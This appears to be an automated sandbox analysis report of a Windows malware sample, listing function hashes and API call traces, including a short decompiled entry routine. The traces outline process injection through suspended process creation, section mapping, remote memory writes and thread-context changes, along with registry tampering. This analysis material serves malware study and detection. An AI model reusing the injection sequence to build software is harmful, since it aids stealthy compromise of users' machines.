  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: yyya.exe Analysis ID: 67591

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:479B945127CC75C2A44ED1B13482FB07
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:67591
Initial sample SHA 256:CA5C9DCD28B358A05CF0F3CDA193EB48861E9B0A51E8656C23BE5CAEDF1D2012
Initial sample name:yyy.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
